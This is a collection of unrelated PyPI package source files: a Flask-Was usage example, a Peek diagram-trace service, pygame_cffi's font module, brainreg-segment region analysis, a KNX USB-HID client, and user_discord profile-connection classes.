## Example
**A simple Signin**
``` python
from flask import Flask
from flask_was import Was, Checker, Column
app = Flask(__name__)
api = Was(app)
api.addChecker(
namespace="signin",
obj=Checker(
{
"name": Column(api.String, biggest_str=20, smallest_str=4),
"email": Column(api.EmailAddress, biggest_str=255, smallest_str=3),
"password": Column(api.String, biggest_str=20, smallest_str=4),
}
),
)
@app.route("/api/signin", methods=["POST"])
@api.checkeout("signin")
def api_signin(postdata):
if postdata[0]:
print("======== A new user coming ... ========")
print("Name: " + postdata[1]["name"])
print("Email: " + postdata[1]["email"])
return api.send(json={"messagess": "Signin was OK"}, status=200)
else:
return api.send(
json={"messagess": "Have some error. Check you forms", "postdata": postdata},
status=400,
)
app.run()
```
**Post Request**:
``` python
import requests
print(requests.post(
"http://127.0.0.1:5000/api/signin",
data={
"name":"Flask",
"email":"[email protected]",
"password":"12345"
},
).text)
```
## Documentation
Read the **documentation** to get started. The documentation is in the `/docs` folder. If this project is helpful to you, please click the **Star**
## Contribution Guide
If you find errors or have good suggestions, please refer to the following template to create **issues** and **pull requests**
- `Good ideas`
``` markdown
## Introduction
What can this idea do ...
## Code
The files I changed and what did I do ...
## Info
Version Information...
Python: 3.6.x
Flask: 1.1.x
Flask-Was: 0.1.x
```
- `Problems in use`
``` markdown
## Buiness
My business needs ...
## Code
Part of the code and full traceback ...
What does my code do ...
## Info
Version Information...
Python: 3.6.x
Flask: 1.1.x
Flask-Was: 0.1.x
```
If you make a useful contribution, you will be added to the **contributors.md**
## License
**MIT LICENSE**
|
PypiClean
|
/peek-plugin-diagram-trace-3.4.11.tar.gz/peek-plugin-diagram-trace-3.4.11/peek_plugin_diagram_trace/plugin-module/_private/services/PrivateDiagramTraceService.ts
|
import { filter, first, takeUntil } from "rxjs/operators";
import { Injectable } from "@angular/core";
import {
DiagramBranchService,
DiagramCoordSetService,
DiagramLookupService,
DiagramOverrideService,
diagramPluginName,
DiagramToolbarService,
ToolbarTypeE,
} from "@peek/peek_plugin_diagram";
import {
DocDbPopupActionI,
DocDbPopupContextI,
DocDbPopupService,
DocDbPopupTypeE,
} from "@peek/peek_core_docdb";
import { DiagramOverrideColor } from "@peek/peek_plugin_diagram/override";
import { ShapeColorTuple } from "@peek/peek_plugin_diagram/lookup_tuples";
import { NgLifeCycleEvents, TupleSelector } from "@synerty/vortexjs";
import { BalloonMsgService } from "@synerty/peek-plugin-base-js";
import {
GraphDbService,
GraphDbTraceResultTuple,
TraceConfigListItemI,
} from "@peek/peek_plugin_graphdb";
import { diagramTraceTuplePrefix } from "../PluginNames";
import { PrivateDiagramTraceTupleService } from "./PrivateDiagramTraceTupleService";
import {
MaxTraceVertexesPropertyName,
SettingPropertyTuple,
TraceColorsPropertyName,
} from "../tuples/SettingPropertyTuple";
import {
DiagramTraceI,
DiagramTraceService,
} from "@peek/peek_plugin_diagram_trace/DiagramTraceService";
/** DMS Diagram Item Popup Service
*
* This service allows other plugins to add information to the item select popups.
*
* This is a helper service to simplify integrations with the diagram.
*
*/
@Injectable()
export class PrivateDiagramTraceService
extends NgLifeCycleEvents
implements DiagramTraceService
{
private traceConfigsByModelSetKey: {
[modelSetKey: string]: TraceConfigListItemI[];
} = {};
private appliedOverrides: DiagramOverrideColor[] = [];
private _activeTraces: DiagramTraceI[] = [];
private readonly clearTracesButtonKey: string;
private originalColorsByModelSet: { [key: string]: ShapeColorTuple[] } = {};
private colorsByModelSet: { [key: string]: ShapeColorTuple[] } = {};
private maxVertexes: number | null = null;
constructor(
private diagramCoordSetService: DiagramCoordSetService,
private tupleService: PrivateDiagramTraceTupleService,
private balloonMsg: BalloonMsgService,
private diagramBranchService: DiagramBranchService,
private objectPopupService: DocDbPopupService,
private diagramToolbar: DiagramToolbarService,
private diagramOverrideService: DiagramOverrideService,
private graphDbService: GraphDbService,
private diagramLookupService: DiagramLookupService
) {
super();
this.clearTracesButtonKey =
diagramTraceTuplePrefix + "diagramTraceTuplePrefix";
if (this.diagramLookupService.isReady()) {
this.setup();
} else {
this.diagramLookupService
.isReadyObservable()
.pipe(filter((ready) => ready))
.pipe(first())
.pipe(takeUntil(this.onDestroyEvent))
.subscribe(() => this.setup());
}
}
get activeTraces(): DiagramTraceI[] {
return this._activeTraces;
}
private setup(): void {
this.objectPopupService
.popupObservable(DocDbPopupTypeE.summaryPopup)
.pipe(
filter(
(c: DocDbPopupContextI) =>
c.triggeredByPlugin == diagramPluginName
)
)
.pipe(takeUntil(this.onDestroyEvent))
.subscribe((c: DocDbPopupContextI) => this.handlePopup(c));
this.objectPopupService
.popupObservable(DocDbPopupTypeE.detailPopup)
.pipe(
filter(
(c: DocDbPopupContextI) =>
c.triggeredByPlugin == diagramPluginName
)
)
.pipe(takeUntil(this.onDestroyEvent))
.subscribe((c: DocDbPopupContextI) => this.handlePopup(c));
// Remove all traces if the diagram goes into edit mode
this.diagramBranchService
.startEditingObservable()
.pipe(takeUntil(this.onDestroyEvent))
.subscribe(() => this.clearAllTraces());
const settingsPropTs = new TupleSelector(
SettingPropertyTuple.tupleName,
{}
);
this.tupleService.tupleDataOfflineObserver
.subscribeToTupleSelector(settingsPropTs)
.pipe(takeUntil(this.onDestroyEvent))
.subscribe((tuples: SettingPropertyTuple[]) => {
for (const prop of tuples) {
switch (prop.key) {
case TraceColorsPropertyName: {
this.loadColors(prop.char_value);
break;
}
case MaxTraceVertexesPropertyName: {
this.maxVertexes = prop.int_value;
break;
}
default: {
// pass
}
}
}
});
}
private loadColors(colorString: string) {
this.colorsByModelSet = {};
this.originalColorsByModelSet = {};
for (const modelSetKey of this.diagramCoordSetService.modelSetKeys()) {
const colors =
this.diagramLookupService.colorsOrderedByName(modelSetKey);
const newColors = (this.colorsByModelSet[modelSetKey] = []);
// This is highly inefficient ...
for (let colorStr of colorString.split(",")) {
colorStr = colorStr.toLowerCase().trim();
for (const c of colors) {
if (c.name.toLowerCase().trim() == colorStr) {
newColors.push(c);
break;
}
}
}
this.originalColorsByModelSet[modelSetKey] = newColors.slice();
}
}
private menusForModelSet(
modelSetKey: string
): Promise<TraceConfigListItemI[]> {
if (this.traceConfigsByModelSetKey[modelSetKey] != null)
return Promise.resolve(this.traceConfigsByModelSetKey[modelSetKey]);
return new Promise<TraceConfigListItemI[]>((resolve, reject) => {
this.graphDbService
.traceConfigListItemsObservable(modelSetKey)
.pipe(takeUntil(this.onDestroyEvent))
.subscribe((tuples: TraceConfigListItemI[]) => {
this.traceConfigsByModelSetKey[modelSetKey] = tuples;
resolve(tuples);
});
});
}
private async handlePopup(context: DocDbPopupContextI): Promise<void> {
if (context.key == null) return;
if (
this.originalColorsByModelSet[context.modelSetKey] == null ||
this.originalColorsByModelSet[context.modelSetKey].length == 0
) {
console.log(
"ERROR: No matching trace colors, please configure in Peek Admin"
);
return;
}
const exists = await this.graphDbService.doesKeyExist(
context.modelSetKey,
context.key
);
if (!exists) return;
let traceConfigs: TraceConfigListItemI[] = [];
try {
traceConfigs = await this.menusForModelSet(context.modelSetKey);
} catch (e) {
this.balloonMsg.showError(`ERROR: Diagram Trace ${e}`);
return;
}
if (traceConfigs == null || traceConfigs.length == 0) return;
const rootMenu: DocDbPopupActionI = {
name: null,
tooltip: "Start a trace from this equipment",
icon: "highlight",
callback: null,
children: [],
closeOnCallback: false,
};
for (const item of traceConfigs) {
rootMenu.children.push({
name: item.title,
tooltip: `Trace type = ${item.name}`,
icon: null,
callback: () => this.menuClicked(item.key, context),
children: [],
closeOnCallback: true,
});
}
context.addAction(rootMenu);
}
private async menuClicked(
traceKey: string,
context: DocDbPopupContextI
): Promise<void> {
// const coordSetKey = context.options.triggeredForContext;
let traceResult: GraphDbTraceResultTuple = null;
try {
traceResult = await this.graphDbService.getTraceResult(
context.modelSetKey,
traceKey,
context.key,
this.maxVertexes
);
} catch (e) {
this.balloonMsg.showError(`ERROR: Diagram Trace ${e}`);
return;
}
if (traceResult.traceAbortedMessage != null) {
this.balloonMsg.showError(traceResult.traceAbortedMessage);
return;
}
// Get the color and rotate the queue
const colors = this.colorsByModelSet[context.modelSetKey];
const color = colors.shift();
colors.push(color);
const override = new DiagramOverrideColor(context.modelSetKey, null);
override.setLineColor(color);
override.setColor(color);
for (let edge of traceResult.edges) {
override.addDispKeys([edge.key]);
}
for (let vertex of traceResult.edges) {
override.addDispKeys([vertex.key]);
}
this.diagramOverrideService.applyOverride(override);
this.appliedOverrides.push(override);
this._activeTraces.push({
modelSetKey: context.modelSetKey,
startKey: context.key,
traceKey: traceKey,
traceModel: traceResult,
});
this.addClearTracesButton(context.modelSetKey);
}
private addClearTracesButton(modelSetKey: string) {
if (this.appliedOverrides.length != 1) return;
this.diagramToolbar.addToolButton(
modelSetKey,
null,
{
key: this.clearTracesButtonKey,
name: "Clear Traces",
tooltip: "Clear Traces",
icon: "clear",
callback: () => this.clearAllTraces(),
children: [],
},
ToolbarTypeE.ViewToolbar
);
}
private removeClearTracesButton() {
if (this.appliedOverrides.length != 0) return;
this.diagramToolbar.removeToolButton(this.clearTracesButtonKey);
}
private clearAllTraces(): void {
for (const modelSetKey of Object.keys(this.originalColorsByModelSet)) {
this.colorsByModelSet[modelSetKey] =
this.originalColorsByModelSet[modelSetKey].slice();
}
while (this.appliedOverrides.length != 0) {
const override = this.appliedOverrides.pop();
this.diagramOverrideService.removeOverride(override);
}
this._activeTraces = [];
this.removeClearTracesButton();
}
}
|
PypiClean
|
/pygame_cffi-0.2.1-cp27-cp27m-win_amd64.whl/pygame/font.py
|
import os
import sys
from pygame._sdl import sdl, ffi
from pygame._error import SDLError
from pygame.base import register_quit
from pygame.color import Color
from pygame.compat import bytes_, ord_, unicode_
from pygame.pkgdata import getResource
from pygame.rwobject import (rwops_from_file, rwops_encode_file_path,
rwops_from_file_path)
from pygame.surface import Surface
from pygame.sysfont import get_fonts, match_font, SysFont
# SDL doesn't stop multiple calls to TTF_Init, so we need to track
# our own status to ensure we don't accidently call TTF_Quit on a
# TTF_Init called outside our control.
_font_initialised = 0
_font_defaultname = "freesansbold.ttf"
if sys.maxunicode == 1114111:
def is_ucs_2(ch):
return ord(ch) < 0x10000
else:
def is_ucs_2(ch):
return True
def utf_8_needs_UCS_4(text):
first = ord(b'\xF0')
for ch in text:
if ord_(ch) >= first:
return True
return False
def autoinit():
global _font_initialised
if not _font_initialised:
register_quit(autoquit)
if sdl.TTF_Init():
return False
_font_initialised = 1
return bool(_font_initialised)
def autoquit():
global _font_initialised
if _font_initialised:
_font_initialised = 0
sdl.TTF_Quit()
def init():
"""pygame.font.init(): return None
initialize the font module"""
if not autoinit():
raise SDLError.from_sdl_error()
def get_init():
"""pygame.font.get_init(): return bool
true if the font module is initialized"""
return _font_initialised > 0
def quit():
"""pygame.font.quit(): return None
uninitialize the font module"""
autoquit()
def check_font():
"""Helper function to test if the font module was initialised
and raises an error if not"""
if not get_init():
raise SDLError("font not initialized")
def get_default_font():
""" get_default_font() -> string
get the filename of the default font
"""
return _font_defaultname
class Font(object):
""" pygame.font.Font(filename, size): return Font
pygame.font.Font(object, size): return Font
create a new Font object from a file"""
_sdl_font = None
_font_file = None
def __init__(self, font, fontsize):
check_font()
if not isinstance(fontsize, int):
raise TypeError("expected an integer, but got %r" % type(fontsize))
if fontsize < 1:
fontsize = 1
file_obj = None
if font is None or font == _font_defaultname:
file_obj = getResource(_font_defaultname)
self._font_file = file_obj
# Scaling as from pygame/src/font.c
fontsize = int(fontsize * 0.6875)
if fontsize < 1:
fontsize = 1
elif isinstance(font, (bytes_, unicode_)):
filepath = rwops_encode_file_path(font)
# According to the pygame comments, we need to ensure the
# file exists and is readable before calling out to SDL
f = open(filepath, 'r')
# pygame raises IOError if this fails, so we don't catch the
# exception
f.close()
self._sdl_font = sdl.TTF_OpenFont(filepath, fontsize)
else:
file_obj = font
if file_obj:
# Get a new handle on the file to load the font from.
# Otherwise, if the file handle is closed elsewhere, font
# rendering will segfault.
if self._font_file is None:
file_obj = open(os.path.abspath(file_obj.name), 'rb')
self._font_file = file_obj
rwops = rwops_from_file(file_obj)
self._sdl_font = sdl.TTF_OpenFontRW(rwops, 1, fontsize)
if not self._sdl_font:
raise SDLError.from_sdl_error()
def __del__(self):
if _font_initialised and self._sdl_font:
sdl.TTF_CloseFont(self._sdl_font)
if self._font_file:
self._font_file.close()
self._font_file = None
self._sdl_font = None
def set_bold(self, bold):
"""Font.set_bold(bool): return None
enable fake rendering of bold text"""
style = sdl.TTF_GetFontStyle(self._sdl_font)
if bold:
style = style | sdl.TTF_STYLE_BOLD
elif style & sdl.TTF_STYLE_BOLD:
style = style ^ sdl.TTF_STYLE_BOLD
sdl.TTF_SetFontStyle(self._sdl_font, style)
def get_bold(self):
"""Font.get_bold(): return bool
check if text will be rendered bold"""
style = sdl.TTF_GetFontStyle(self._sdl_font)
return style & sdl.TTF_STYLE_BOLD != 0
def set_underline(self, underline):
"""Font.set_underline(bool): return None
control if text is rendered with an underline"""
style = sdl.TTF_GetFontStyle(self._sdl_font)
if underline:
style = style | sdl.TTF_STYLE_UNDERLINE
elif style & sdl.TTF_STYLE_UNDERLINE:
style = style ^ sdl.TTF_STYLE_UNDERLINE
sdl.TTF_SetFontStyle(self._sdl_font, style)
def get_underline(self):
"""Font.get_underline(): return bool
check if text will be rendered with an underline"""
style = sdl.TTF_GetFontStyle(self._sdl_font)
return style & sdl.TTF_STYLE_UNDERLINE != 0
def set_italic(self, italic):
"""Font.set_italic(bool): return None
enable fake rendering of italic text"""
style = sdl.TTF_GetFontStyle(self._sdl_font)
if italic:
style = style | sdl.TTF_STYLE_ITALIC
elif style & sdl.TTF_STYLE_ITALIC:
style = style ^ sdl.TTF_STYLE_ITALIC
sdl.TTF_SetFontStyle(self._sdl_font, style)
def get_italic(self):
"""Font.get_italic(): return bool
check if text will be rendered italic"""
style = sdl.TTF_GetFontStyle(self._sdl_font)
return style & sdl.TTF_STYLE_ITALIC != 0
def metrics(self, text):
""" metrics(text) -> list
Gets the metrics for each character in the pased string.
"""
if not isinstance(text, (bytes_, unicode_)):
raise TypeError("text must be a string or unicode")
if isinstance(text, bytes_):
# Upstream assumes latin-1. They be crazy.
text = text.decode('UTF-8')
results = []
minx, maxx, miny, maxy, advance = [ffi.new('int*') for i in range(5)]
for i, ch in enumerate(text):
if is_ucs_2(ch) and not \
sdl.TTF_GlyphMetrics(self._sdl_font, ord(ch),
minx, maxx, miny, maxy,
advance):
results.append((minx[0], maxx[0], miny[0],
maxy[0], advance[0]))
else:
results.append(None)
return results
def get_linesize(self):
""" get_linesize() -> int
get the line space of the font text
"""
return sdl.TTF_FontLineSkip(self._sdl_font)
def get_height(self):
""" get_height() -> int
get the height of the font
"""
return sdl.TTF_FontHeight(self._sdl_font)
def get_ascent(self):
""" get_ascent() -> int
get the ascent of the font
"""
return sdl.TTF_FontAscent(self._sdl_font)
def get_descent(self):
""" get_descent() -> int
get the descent of the font
"""
return sdl.TTF_FontDescent(self._sdl_font)
def size(self, text):
"""Font.size(text): return (width, height)
determine the amount of space needed to render text"""
if not isinstance(text, (bytes_, unicode_)):
raise TypeError("text must be a string or unicode")
if isinstance(text, unicode_):
text = text.encode('utf-8', 'replace')
w = ffi.new("int*")
h = ffi.new("int*")
ecode = sdl.TTF_SizeUTF8(self._sdl_font, text, w, h)
if ecode == -1:
raise SDLError(ffi.string(sdl.TTF_GetError()))
return int(w[0]), int(h[0])
def render(self, text, antialias, color, background=None):
"""Font.render(text, antialias, color, background=None): return Surface
draw text on a new Surface"""
color = Color(color)
fg = ffi.new("SDL_Color [1]")
bg = ffi.new("SDL_Color [1]")
fg[0].r = color.r
fg[0].g = color.g
fg[0].b = color.b
if background:
try:
background = Color(background)
bg[0].r = background.r
bg[0].g = background.g
bg[0].b = background.b
except (TypeError, ValueError):
# Same error behaviour as pygame
bg[0].r = 0
bg[0].g = 0
bg[0].b = 0
else:
bg[0].r = 0
bg[0].g = 0
bg[0].b = 0
if text is None or text == '':
# Just return a surface of width 1 x font height
height = sdl.TTF_FontHeight(self._sdl_font)
surf = Surface((1, height))
if background and isinstance(background, Color):
surf.fill(background)
else:
# clear the colorkey
surf.set_colorkey(flags=sdl.SDL_SRCCOLORKEY)
return surf
if not isinstance(text, (bytes_, unicode_)):
raise TypeError("text must be a string or unicode")
if isinstance(text, unicode_):
text = text.encode('utf-8', 'replace')
if utf_8_needs_UCS_4(text):
raise UnicodeError("A Unicode character above '\\uFFFF' was found;"
" not supported")
if b'\x00' in text:
raise ValueError("A null character was found in the text")
if antialias:
if background is None:
sdl_surf = sdl.TTF_RenderUTF8_Blended(self._sdl_font,
text, fg[0])
else:
sdl_surf = sdl.TTF_RenderUTF8_Shaded(self._sdl_font,
text, fg[0], bg[0])
else:
sdl_surf = sdl.TTF_RenderUTF8_Solid(self._sdl_font,
text, fg[0])
if not sdl_surf:
raise SDLError(ffi.string(sdl.TTF_GetError()))
surf = Surface._from_sdl_surface(sdl_surf)
if not antialias and background is not None:
surf.set_colorkey()
surf.set_palette([(bg[0].r, bg[0].g, bg[0].b)])
return surf
# for ftfont to be used as drop-in replacement
FontType = Font
|
PypiClean
|
/brainreg-segment-0.2.18.tar.gz/brainreg-segment-0.2.18/brainreg_segment/regions/analysis.py
|
import numpy as np
import pandas as pd
from brainglobe_utils.general.list import unique_elements_lists
from brainglobe_utils.pandas.misc import initialise_df
from napari.qt.threading import thread_worker
from skimage.measure import regionprops_table
from brainreg_segment.atlas.utils import lateralise_atlas_image
@thread_worker
def region_analysis(
label_layers,
annotations_layer_image,
atlas,
hemispheres,
regions_directory,
output_csv_file=None,
volumes=True,
summarise=True,
):
regions_directory.mkdir(parents=True, exist_ok=True)
if volumes:
print("Calculating region volume distribution")
print(f"Saving summary volumes to: {regions_directory}")
for label_layer in label_layers:
analyse_region_brain_areas(
label_layer,
annotations_layer_image,
hemispheres,
regions_directory,
atlas,
)
if summarise:
if output_csv_file is not None:
print("Summarising regions")
summarise_brain_regions(
label_layers, output_csv_file, atlas.resolution
)
print("Finished!\n")
def summarise_brain_regions(label_layers, filename, atlas_resolution):
summaries = []
for label_layer in label_layers:
summaries.append(summarise_single_brain_region(label_layer))
if check_list_only_nones(summaries):
print("No regions to summarise")
return
result = pd.concat(summaries)
# TODO: use atlas.space to make these more intuitive
volume_header = "volume_mm3"
length_columns = [
"axis_0_min_um",
"axis_1_min_um",
"axis_2_min_um",
"axis_0_max_um",
"axis_1_max_um",
"axis_2_max_um",
"axis_0_center_um",
"axis_1_center_um",
"axis_2_center_um",
]
result.columns = ["region"] + [volume_header] + length_columns
voxel_volume_in_mm = np.prod(atlas_resolution) / (1000**3)
result[volume_header] = result[volume_header] * voxel_volume_in_mm
for header in length_columns:
for dim, idx in enumerate(atlas_resolution):
if header.startswith(f"axis_{dim}"):
scale = float(idx)
assert scale > 0
result[header] = result[header] * scale
result.to_csv(filename, index=False)
def check_list_only_nones(input_list):
return all(v is None for v in input_list)
def summarise_single_brain_region(
label_layer,
ignore_empty=True,
properties_to_fetch=[
"area",
"bbox",
"centroid",
],
):
data = np.asarray(label_layer.data)
if ignore_empty:
if data.sum() == 0:
return
regions_table = regionprops_table(
data.astype(np.uint16), properties=properties_to_fetch
)
df = pd.DataFrame.from_dict(regions_table)
df.insert(0, "region", label_layer.name)
return df
def analyse_region_brain_areas(
label_layer,
annotations_layer_image,
hemispheres,
destination_directory,
atlas,
extension=".csv",
ignore_empty=True,
):
"""
:param label_layer: napari labels layer (with segmented regions)
:param ignore_empty: If True, don't analyse empty regions
"""
data = label_layer.data
if ignore_empty:
if data.sum() == 0:
return
name = label_layer.name
masked_annotations = data.astype(bool) * annotations_layer_image
annotations_left, annotations_right = lateralise_atlas_image(
masked_annotations,
hemispheres,
left_hemisphere_value=atlas.left_hemisphere_value,
right_hemisphere_value=atlas.right_hemisphere_value,
)
unique_vals_left, counts_left = np.unique(
annotations_left, return_counts=True
)
unique_vals_right, counts_right = np.unique(
annotations_right, return_counts=True
)
voxel_volume_in_mm = np.prod(atlas.resolution) / (1000**3)
df = initialise_df(
"structure_name",
"left_volume_mm3",
"left_percentage_of_total",
"right_volume_mm3",
"right_percentage_of_total",
"total_volume_mm3",
"percentage_of_total",
)
sampled_structures = unique_elements_lists(
list(unique_vals_left) + list(unique_vals_right)
)
total_volume_region = get_total_volume_regions(
unique_vals_left, unique_vals_right, counts_left, counts_right
)
for atlas_value in sampled_structures:
if atlas_value != 0:
try:
df = add_structure_volume_to_df(
df,
atlas_value,
atlas.structures,
unique_vals_left,
unique_vals_right,
counts_left,
counts_right,
voxel_volume_in_mm,
total_volume_voxels=total_volume_region,
)
except KeyError:
print(
f"Value: {atlas_value} is not in the atlas structure"
f" reference file. Not calculating the volume"
)
filename = destination_directory / (name + extension)
df.to_csv(filename, index=False)
def get_total_volume_regions(
unique_vals_left,
unique_vals_right,
counts_left,
counts_right,
):
zero_index_left = np.where(unique_vals_left == 0)[0][0]
counts_left = list(counts_left)
counts_left.pop(zero_index_left)
zero_index_right = np.where(unique_vals_right == 0)[0][0]
counts_right = list(counts_right)
counts_right.pop(zero_index_right)
return sum(counts_left + counts_right)
def add_structure_volume_to_df(
df,
atlas_value,
atlas_structures,
unique_vals_left,
unique_vals_right,
counts_left,
counts_right,
voxel_volume,
total_volume_voxels=None,
):
name = atlas_structures[atlas_value]["name"]
left_volume, left_percentage = get_volume_in_hemisphere(
atlas_value,
unique_vals_left,
counts_left,
total_volume_voxels,
voxel_volume,
)
right_volume, right_percentage = get_volume_in_hemisphere(
atlas_value,
unique_vals_right,
counts_right,
total_volume_voxels,
voxel_volume,
)
if total_volume_voxels is not None:
total_percentage = left_percentage + right_percentage
else:
total_percentage = 0
data_to_append = {
"structure_name": [name],
"left_volume_mm3": [left_volume],
"left_percentage_of_total": [left_percentage],
"right_volume_mm3": [right_volume],
"right_percentage_of_total": [right_percentage],
"total_volume_mm3": [left_volume + right_volume],
"percentage_of_total": [total_percentage],
}
df_to_append = pd.DataFrame(data_to_append)
df = pd.concat([df, df_to_append], ignore_index=True)
return df
def get_volume_in_hemisphere(
atlas_value, unique_vals, counts, total_volume_voxels, voxel_volume
):
try:
index = np.where(unique_vals == atlas_value)[0][0]
volume = counts[index] * voxel_volume
if total_volume_voxels is not None:
percentage = 100 * (counts[index] / total_volume_voxels)
else:
percentage = 0
except IndexError:
volume = 0
percentage = 0
return volume, percentage
|
PypiClean
|
/automate_knx_plugin-0.9.1-py3-none-any.whl/knx_plugin/client/usbhid.py
|
import asyncio
import logging
import knx_stack
from knx_plugin.client import Client as Parent
class MsgNotEncoded(Exception):
"""Knx msg has not been encoded"""
class Client(Parent):
def data_received(self, data):
msgs = self.decode(data)
(reqs, cons, inds, others) = self.filter(msgs)
for task in self._tasks:
for msg in cons:
self._loop.create_task(task(msg))
for msg in inds:
self._loop.create_task(task(msg))
def decode(self, data):
msgs = list()
str_msgs = data.decode()
splitted_data = str_msgs.split("\n")
all_msgs = list()
for msg in splitted_data:
try:
if msg:
octects_msg = knx_stack.Msg.make_from_str(msg)
self.logger.debug("received: {}".format(octects_msg))
msgs = knx_stack.decode_msg(self._state, octects_msg)
if msgs:
all_msgs.extend(msgs)
except IndexError as e:
self.logger.error(str(e) + " decoding msg: " + str(msg))
except ValueError as e:
self.logger.error(str(e) + " decoding msg: " + str(msg))
return all_msgs
def encode(self, msg):
knx_msg = super(Client, self).encode(msg)
self.logger.debug("sent: {}".format(knx_msg))
knx_msg = str(knx_msg)
padding = 112 - len(knx_msg)
padded_msg = knx_msg + "0" * padding
padded_msg += "\n"
return padded_msg
async def write(self, msgs, *args):
await self._wait_for_transport()
for msg in msgs:
if isinstance(msg, knx_stack.layer.application.a_group_value_write.req.Msg):
knx_msg = str(self.encode(msg))
self.logger.info("written {}".format(knx_msg))
self._transport.write(knx_msg.encode())
class ClientExample(object):
def __init__(self):
self._transport = None
self._protocol = None
def send_msg(self, msg, *args):
state = args[0]
new_state = state
final_msg = None
if isinstance(msg, knx_stack.layer.application.a_group_value_write.req.Msg):
final_msg = knx_stack.encode_msg(state, msg)
elif isinstance(msg, knx_stack.layer.application.a_group_value_read.req.Msg):
final_msg = knx_stack.encode_msg(state, msg)
if final_msg:
self._transport.write(str(final_msg).encode())
return new_state
async def run(self):
self._transport, self._protocol = await loop.create_connection(
lambda: Client(None, []), "localhost", 5555
)
address_table = knx_stack.AddressTable(0x0000, [], 255)
association_table = knx_stack.AssociationTable(address_table, {})
new_association_table = association_table.associate(0x0E89, 1)
from knx_stack.datapointtypes import DPT_Switch
state = knx_stack.State(
knx_stack.Medium.usb_hid, new_association_table, {1: DPT_Switch}
)
switch = DPT_Switch()
switch.bits.action = DPT_Switch.Action.on
req_msg = knx_stack.layer.application.a_group_value_write.req.Msg(
asap=1, dpt=switch
)
while True:
self.send_msg(req_msg, state)
await asyncio.sleep(3)
if __name__ == "__main__":
import sys
root = logging.getLogger()
root.setLevel(logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
root.addHandler(handler)
loop = asyncio.get_event_loop()
loop.create_task(ClientExample().run())
loop.run_forever()
|
PypiClean
|
/user_discord-2.0.6.tar.gz/user_discord-2.0.6/user_discord/discord/connections.py
|
from __future__ import annotations
from typing import TYPE_CHECKING, List, Optional
from .enums import ConnectionType, try_enum
from .integrations import Integration
from .metadata import Metadata
from .utils import MISSING
if TYPE_CHECKING:
from .guild import Guild
from .state import ConnectionState
from .types.integration import ConnectionIntegration as IntegrationPayload
from .types.user import Connection as ConnectionPayload, PartialConnection as PartialConnectionPayload
__all__ = (
'PartialConnection',
'Connection',
)
class PartialConnection:
"""Represents a partial Discord profile connection.
This is the info you get for other users' connections.
.. versionadded:: 2.0
.. container:: operations
.. describe:: x == y
Checks if two connections are equal.
.. describe:: x != y
Checks if two connections are not equal.
.. describe:: hash(x)
Return the connection's hash.
.. describe:: str(x)
Returns the connection's name.
Attributes
----------
id: :class:`str`
The connection's account ID.
name: :class:`str`
The connection's account name.
type: :class:`ConnectionType`
The connection service type (e.g. youtube, twitch, etc.).
verified: :class:`bool`
Whether the connection is verified.
visible: :class:`bool`
Whether the connection is visible on the user's profile.
metadata: Optional[:class:`Metadata`]
Various metadata about the connection.
The contents of this are always subject to change.
"""
__slots__ = ('id', 'name', 'type', 'verified', 'visible', 'metadata')
def __init__(self, data: PartialConnectionPayload):
self._update(data)
def __str__(self) -> str:
return self.name
def __repr__(self) -> str:
return f'<{self.__class__.__name__} id={self.id!r} name={self.name!r} type={self.type!r} visible={self.visible}>'
def __hash__(self) -> int:
return hash((self.type.value, self.id))
def __eq__(self, other: object) -> bool:
if isinstance(other, PartialConnection):
return self.id == other.id and self.name == other.name
return False
def __ne__(self, other: object) -> bool:
if isinstance(other, PartialConnection):
return self.id != other.id or self.name != other.name
return True
def _update(self, data: PartialConnectionPayload):
self.id: str = data['id']
self.name: str = data['name']
self.type: ConnectionType = try_enum(ConnectionType, data['type'])
self.verified: bool = data['verified']
self.visible: bool = True # If we have a partial connection, it's visible
self.metadata: Optional[Metadata] = Metadata(data['metadata']) if 'metadata' in data else None
@property
def url(self) -> Optional[str]:
"""Optional[:class:`str`]: Returns a URL linking to the connection's profile, if available."""
if self.type == ConnectionType.twitch:
return f'https://www.twitch.tv/{self.name}'
elif self.type == ConnectionType.youtube:
return f'https://www.youtube.com/{self.id}'
elif self.type == ConnectionType.skype:
return f'skype:{self.id}?userinfo'
elif self.type == ConnectionType.steam:
return f'https://steamcommunity.com/profiles/{self.id}'
elif self.type == ConnectionType.reddit:
return f'https://www.reddit.com/u/{self.name}'
elif self.type == ConnectionType.facebook:
return f'https://www.facebook.com/{self.name}'
elif self.type == ConnectionType.twitter:
return f'https://twitter.com/{self.name}'
elif self.type == ConnectionType.spotify:
return f'https://open.spotify.com/user/{self.id}'
elif self.type == ConnectionType.xbox:
return f'https://account.xbox.com/en-US/Profile?Gamertag={self.name}'
elif self.type == ConnectionType.github:
return f'https://github.com/{self.name}'
elif self.type == ConnectionType.tiktok:
return f'https://tiktok.com/@{self.name}'
class Connection(PartialConnection):
"""Represents a Discord profile connection.
.. versionadded:: 2.0
.. container:: operations
.. describe:: x == y
Checks if two connections are equal.
.. describe:: x != y
Checks if two connections are not equal.
.. describe:: hash(x)
Return the connection's hash.
.. describe:: str(x)
Returns the connection's name.
Attributes
----------
revoked: :class:`bool`
Whether the connection is revoked.
friend_sync: :class:`bool`
Whether friends are synced over the connection.
show_activity: :class:`bool`
Whether activities from this connection will be shown in presences.
two_way_link: :class:`bool`
Whether the connection is authorized both ways (i.e. it's both a connection and an authorization).
metadata_visible: :class:`bool`
Whether the connection's metadata is visible.
metadata: Optional[:class:`Metadata`]
Various metadata about the connection.
The contents of this are always subject to change.
access_token: Optional[:class:`str`]
The OAuth2 access token for the account, if applicable.
integrations: List[:class:`Integration`]
The integrations attached to the connection.
"""
__slots__ = (
'_state',
'revoked',
'friend_sync',
'show_activity',
'two_way_link',
'metadata_visible',
'access_token',
'integrations',
)
def __init__(self, *, data: ConnectionPayload, state: ConnectionState):
self._update(data)
self._state = state
self.access_token: Optional[str] = None
def _update(self, data: ConnectionPayload):
super()._update(data)
self.revoked: bool = data.get('revoked', False)
self.visible: bool = bool(data.get('visibility', False))
self.friend_sync: bool = data.get('friend_sync', False)
self.show_activity: bool = data.get('show_activity', True)
self.two_way_link: bool = data.get('two_way_link', False)
self.metadata_visible: bool = bool(data.get('metadata_visibility', False))
# Only sometimes in the payload
try:
self.access_token: Optional[str] = data['access_token']
except KeyError:
pass
self.integrations: List[Integration] = [
Integration(data=i, guild=self._resolve_guild(i)) for i in data.get('integrations') or []
]
def _resolve_guild(self, data: IntegrationPayload) -> Guild:
from .guild import Guild
state = self._state
guild_data = data.get('guild')
if not guild_data:
return None # type: ignore
